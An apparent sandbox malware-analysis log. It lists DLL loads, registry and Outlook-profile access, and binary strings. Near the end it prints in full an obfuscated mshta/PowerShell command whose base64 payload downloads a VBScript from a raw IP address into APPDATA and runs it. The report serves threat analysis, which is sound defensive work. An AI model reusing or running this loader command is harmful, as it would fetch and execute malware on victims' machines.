                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: webio.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: mswsock.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winnsi.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\explorer.exeSection loaded: aepic.dll
                Source: C:\Windows\explorer.exeSection loaded: twinapi.dll
                Source: C:\Windows\explorer.exeSection loaded: userenv.dll
                Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\explorer.exeSection loaded: dxgi.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\explorer.exeSection loaded: propsys.dll
                Source: C:\Windows\explorer.exeSection loaded: coremessaging.dll
                Source: C:\Windows\explorer.exeSection loaded: urlmon.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dll
                Source: C:\Windows\explorer.exeSection loaded: wininet.dll
                Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
                Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
                Source: C:\Windows\explorer.exeSection loaded: sspicli.dll
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dll
                Source: C:\Windows\explorer.exeSection loaded: ntmarta.dll
                Source: C:\Windows\explorer.exeSection loaded: cryptsp.dll
                Source: C:\Windows\explorer.exeSection loaded: wldp.dll
                Source: C:\Windows\explorer.exeSection loaded: iertutil.dll
                Source: C:\Windows\explorer.exeSection loaded: srvcli.dll
                Source: C:\Windows\explorer.exeSection loaded: netutils.dll
                Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
                Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
                Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dll
                Source: C:\Windows\explorer.exeSection loaded: aepic.dll
                Source: C:\Windows\explorer.exeSection loaded: twinapi.dll
                Source: C:\Windows\explorer.exeSection loaded: userenv.dll
                Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\explorer.exeSection loaded: dxgi.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\explorer.exeSection loaded: propsys.dll
                Source: C:\Windows\explorer.exeSection loaded: coremessaging.dll
                Source: C:\Windows\explorer.exeSection loaded: urlmon.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dll
                Source: C:\Windows\explorer.exeSection loaded: wininet.dll
                Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
                Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
                Source: C:\Windows\explorer.exeSection loaded: sspicli.dll
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dll
                Source: C:\Windows\explorer.exeSection loaded: ntmarta.dll
                Source: C:\Windows\explorer.exeSection loaded: cryptsp.dll
                Source: C:\Windows\explorer.exeSection loaded: wldp.dll
                Source: C:\Windows\explorer.exeSection loaded: iertutil.dll
                Source: C:\Windows\explorer.exeSection loaded: srvcli.dll
                Source: C:\Windows\explorer.exeSection loaded: netutils.dll
                Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
                Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dll
                Source: C:\Windows\explorer.exeSection loaded: aepic.dll
                Source: C:\Windows\explorer.exeSection loaded: twinapi.dll
                Source: C:\Windows\explorer.exeSection loaded: userenv.dll
                Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\explorer.exeSection loaded: dxgi.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\explorer.exeSection loaded: propsys.dll
                Source: C:\Windows\explorer.exeSection loaded: coremessaging.dll
                Source: C:\Windows\explorer.exeSection loaded: urlmon.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dll
                Source: C:\Windows\explorer.exeSection loaded: wininet.dll
                Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
                Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
                Source: C:\Windows\explorer.exeSection loaded: sspicli.dll
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dll
                Source: C:\Windows\explorer.exeSection loaded: ntmarta.dll
                Source: C:\Windows\explorer.exeSection loaded: cryptsp.dll
                Source: C:\Windows\explorer.exeSection loaded: wldp.dll
                Source: C:\Windows\explorer.exeSection loaded: iertutil.dll
                Source: C:\Windows\explorer.exeSection loaded: srvcli.dll
                Source: C:\Windows\explorer.exeSection loaded: netutils.dll
                Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
                Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
                Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dll
                Source: C:\Windows\explorer.exeSection loaded: aepic.dll
                Source: C:\Windows\explorer.exeSection loaded: twinapi.dll
                Source: C:\Windows\explorer.exeSection loaded: userenv.dll
                Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\explorer.exeSection loaded: dxgi.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\explorer.exeSection loaded: propsys.dll
                Source: C:\Windows\explorer.exeSection loaded: coremessaging.dll
                Source: C:\Windows\explorer.exeSection loaded: urlmon.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dll
                Source: C:\Windows\explorer.exeSection loaded: wininet.dll
                Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
                Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
                Source: C:\Windows\explorer.exeSection loaded: sspicli.dll
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dll
                Source: C:\Windows\explorer.exeSection loaded: ntmarta.dll
                Source: C:\Windows\explorer.exeSection loaded: cryptsp.dll
                Source: C:\Windows\explorer.exeSection loaded: wldp.dll
                Source: C:\Windows\explorer.exeSection loaded: iertutil.dll
                Source: C:\Windows\explorer.exeSection loaded: srvcli.dll
                Source: C:\Windows\explorer.exeSection loaded: netutils.dll
                Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
                Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
                Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
                Source: C:\Users\user\AppData\Roaming\icgfugfSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\icgfugfSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\icgfugfSection loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\icgfugfSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\icgfugfSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\icgfugfSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: Binary string: $^q7C:\Users\user\AppData\Local\Temp\thj2bm0i\thj2bm0i.pdb source: powershell.exe, 00000004.00000002.1762483774.0000000004F17000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000008.00000002.1940207997.0000000006372000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000008.00000002.1973004774.000000000707B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1971140719.00000000068D0000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.dotnetihascustomattributeczprocess_informationcxcydnlib.dotnet.mdrawassemblyrefrowhmdnlib.dotnet.writermethodbodychunkshlmicrosoft.win32.taskschedulernetworksettingshohnhihhhkhjhehdhghfhamicrosoft.win32.taskschedulertaskschedulersnapshothchbcronfieldtypesystem.runtime.compilerservicesisreadonlyattributednlib.dotnet.mdrawtypespecrowdnlib.dotnetfielddefuserdnlib.dotnetinterfacemarshaltypefa`1hyhxdnlib.dotnet.writermetadataflagsdnlib.dotnet.mdrawfieldlayoutrowhzmicrosoft.win32.taskschedulertaskhuhthwdnlib.dotnet.writermetadataoptionshvhqdnlib.dotnetimdtokenproviderhphshrdnlib.dotnetsignatureequalitycomparermicrosoft.win32.taskschedulerquicktriggertypeilimdnlib.dotnetifullnamecreatorhelperinioihiidnlib.dotnet.resourcesresourceelementdnlib.dotnetmodulecreationoptionsijikiddnlib.dotnet.emitiinstructionoperandresolverieigdnlib.utilslazylist`1iaibdnlib.dotnetpropertyattributesicdnlib.dotnet.mdrawmethodrowdnlib.dotnet.mdrawassemblyrowdnlib.threadingexecutelockeddelegate`3dnlib.dotnetmoduledefmddnlib.ioiimagestreamixiydnlib.dotnetclasssigizdnlib.dotnetstrongnamesignerdnlib.dotnetinvalidkeyexceptionitiuelemequalitycompareriviwipiqdnlib.dotnet.mdrawpropertyptrrowirisdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduler.fluentbasebuilderdnlib.dotnet.mdheapstreamdnlib.pepeimagednlib.dotnetitypedeffindermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocalc`5dnlib.dotneticontainsgenericparameterb`3b`1b`1b`1dnlib.dotnetitokenoperandc`1dnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvt
                Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000008.00000002.1940207997.0000000006372000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000008.00000002.1940207997.0000000006372000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000008.00000002.1940207997.0000000006372000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.PdbWriter+b source: powershell.exe, 00000008.00000002.1940207997.0000000006372000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: aspnet_compiler.pdb source: icgfugf, 0000000F.00000000.2187284917.0000000000732000.00000002.00000001.01000000.0000000F.sdmp, icgfugf.14.dr
                Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000008.00000002.1973004774.000000000707B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1971140719.00000000068D0000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000008.00000002.1940207997.0000000006372000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000008.00000002.1973004774.000000000707B000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000008.00000002.1940207997.0000000006372000.00000004.00000800.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))"
